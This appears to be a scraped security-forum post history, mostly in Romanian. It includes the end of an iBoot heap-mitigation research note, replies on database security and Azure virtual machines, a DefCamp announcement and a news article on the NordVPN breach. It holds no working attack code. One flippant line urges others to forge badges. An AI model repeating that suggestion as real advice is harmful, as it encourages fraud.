64-bit devices, since malloc's size argument would be 64-bit in such case. In summary, these mitigations ensure a basic level of heap protection on recent devices. Exploitation of typical heap corruption vulnerabilities such as data-to-heap and cross-chunk overflows is still possible and realistic in many cases. The strongest mitigations in place are checksum verification and safe unlinking, that would make exploitation of cross-chunk overflows on recent devices non-trivial. This is especially relevant to iBoot, which uses the heap more actively than SecuROM, thus making it more likely that a corrupted heap metadata will be detected before the shellcode had a chance to execute. References 1. "iBoot address space", Alisa Esage http://re.alisa.sh/notes/iBoot-address-space.html 2. iOS Security Guide https://www.apple.com/business/docs/site/iOS_Security_Guide.pdf 3. Memory Management Reference https://www.memorymanagement.org/index.html. Annex A This research note is a teaser into advanced stages of iBootcamp, an online training course on iOS internals and vulnerability research for beginners that I am creating. The only live session of Stage 0 will take place on 12-21 December 2019. You are welcome. ⭐️ Created and published by Alisa Esage Шевченко on 23 November 2019. Last edited: 23 November 2019. Original URL: http://re.alisa.sh/notes/iBoot-heap-internals.html. Author's contacts: e-mail, twitter, github. Sursa: https://re.alisa.sh/notes/iBoot-heap-internals.html
  13. Salut, chiar daca le ia de pe un host, cineva poate sa vada de unde le ia si sa le ia singur. Nu exista nicio solutie ca o aplicatie sa se conecteze direct la o baza de date astfel incat cineva rau intentionat sa nu poata face acest lucru. Pentru astfel de lucruri poti face o aplicatie web, un API, pe care aplicatia C# sa o contacteze si sa descrie operatii cu baza de date. De preferat pe baza de autentificare (e.g. un user se logheaza si apoi face diverse lucruri acolo).
  14. Cine se mai abate de la subiect, aduce injurii sau face offtopic - ban direct.
  15. Cauta o carte, fie o cumperi fie o descarci ca PDF (gasesti cam tot ce vrei) si o citesti. In timp ce citesti si exersezi. Cred ca e cel mai simplu si eficient. Cat despre alta documentatie, ai php.net unde gasesti cam tot ce ai nevoie plus o tona de tutoriale legate de orice. Inclusiv partea de securitate, unde trebuie sa ai grija.
  16. Cine nu are bilet sa isi ia azi ca se pare ca de maine se scumpesc.
  17. Falsificati si voi niste badge-uri, cat de greu sa fie?
  18. Ca hint e un "://" in acel mesaj, deci probabil un URL. Apoi, sunt acele numere cu care se pot face lucruri
  19. Folosind Azure API creezi masina virtuala cu Windows 10. Poti face tu una care sa contina ce vrei tu instalat si o clonezi cand creezi una noua. Generezi parola random si dai allow portului de RDP din Network Security Group pe resursa (VM-ul) creat. Si userii se conecteaza prin RDP si fac ce ii taie capul acolo. Sunt multe discutii referitoare la crearea de VM-uri pe stackoverflow.
  20. Depinde ce intelegi prin acel remote control. In primul rand, cu sistem de operare o sa aiba masinile virtuale, Linux? Apoi, ce vrei sa le permiti userilor sa faca prin acel remote control?
  21. Daca folosesti masini virtuale in Azure, poti sa folosesti API-ul de la Azure ca sa creezi masini virtuale si nu e dificil. Insa nu stiu cum sta treaca cu costurile. https://docs.microsoft.com/en-us/azure/virtual-machines/linux/create-vm-rest-api
  22. International Hacking & Information Security Conference 7th-8th NOV 2019 BUY TICKETS Bucharest Romania About DefCamp DefCamp is the most important annual conference on Hacking & Information Security in Central Eastern Europe. Every year brings together the world’s leading cyber security doers to share latest researches and knowledge. Over 2,000 decision makers, security specialists, entrepreneurs, developers, academic, private and public sectors will meet under the same roof in Bucharest, Romania every fall, in November. Worldwide recognized speakers will showcase the naked truth about sensitive topics like infrastructure (in)security, GDPR, cyber warfare, ransomware, malware, social engineering, offensive & defensive security measurements etc. Yet, the most active part of the conference is Hacking Village , the special designed playground for all hacking activities happening at DefCamp. Site: https://def.camp/
  23. Salut, daca vrei doar pentru teste si nu ceva profesional (e.g. pe care sa ceri bani) solutia cea mai SIMPLA ar putea fi sa creezi un docker container. Doar ca nu e chiar masina virtuala. Daca vrei sa dai VPS-uri, devine mai complicat.
  24. NordVPN, a virtual private network provider that promises to “protect your privacy online,” has confirmed it was hacked. The admission comes following rumors that the company had been breached. It first emerged that NordVPN had an expired internal private key exposed, potentially allowing anyone to spin out their own servers imitating NordVPN. VPN providers are increasingly popular as they ostensibly provide privacy from your internet provider and visiting sites about your internet browsing traffic. That’s why journalists and activists often use these services, particularly when they’re working in hostile states. These providers channel all of your internet traffic through one encrypted pipe, making it more difficult for anyone on the internet to see which sites you are visiting or which apps you are using. But often that means displacing your browsing history from your internet provider to your VPN provider. That’s left many providers open to scrutiny, as often it’s not clear if each provider is logging every site a user visits. For its part, NordVPN has claimed a “zero logs” policy. “We don’t track, collect, or share your private data,” the company says. But the breach is likely to cause alarm that hackers may have been in a position to access some user data. NordVPN told TechCrunch that one of its data centers was accessed in March 2018. “One of the data centers in Finland we are renting our servers from was accessed with no authorization,” said NordVPN spokesperson Laura Tyrell. The attacker gained access to the server — which had been active for about a month — by exploiting an insecure remote management system left by the data center provider; NordVPN said it was unaware that such a system existed. NordVPN did not name the data center provider. “The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either,” said the spokesperson. “On the same note, the only possible way to abuse the website traffic was by performing a personalized and complicated man-in-the-middle attack to intercept a single connection that tried to access NordVPN.” According to the spokesperson, the expired private key could not have been used to decrypt the VPN traffic on any other server. NordVPN said it found out about the breach a “few months ago,” but the spokesperson said the breach was not disclosed until today because the company wanted to be “100% sure that each component within our infrastructure is secure.” A senior security researcher we spoke to who reviewed the statement and other evidence of the breach, but asked not to be named as they work for a company that requires authorization to speak to the press, called these findings “troubling.” “While this is unconfirmed and we await further forensic evidence, this is an indication of a full remote compromise of this provider’s systems,” the security researcher said. “That should be deeply concerning to anyone who uses or promotes these particular services.” NordVPN said “no other server on our network has been affected.” But the security researcher warned that NordVPN was ignoring the larger issue of the attacker’s possible access across the network. “Your car was just stolen and taken on a joy ride and you’re quibbling about which buttons were pushed on the radio?” the researcher said. The company confirmed it had installed intrusion detection systems, a popular technology that companies use to detect early breaches, but “no-one could know about an undisclosed remote management system left by the [data center] provider,” said the spokesperson. “They spent millions on ads, but apparently nothing on effective defensive security,” the researcher said. NordVPN was recently recommended by TechRadar and PCMag. CNET described it as its “favorite” VPN provider. It’s also believed several other VPN providers may have been breached around the same time. Similar records posted online — and seen by TechCrunch — suggest that TorGuard and VikingVPN may have also been compromised. A spokesperson for TorGuard told TechCrunch that a “single server” was compromised in 2017 but denied that any VPN traffic was accessed. TorGuard also put out an extensive statement following a May blog post, which first revealed the breach. Updated with comment from TorGuard. Sursa: https://techcrunch.com/2019/10/21/nordvpn-confirms-it-was-hacked/
×
×
  • Create New...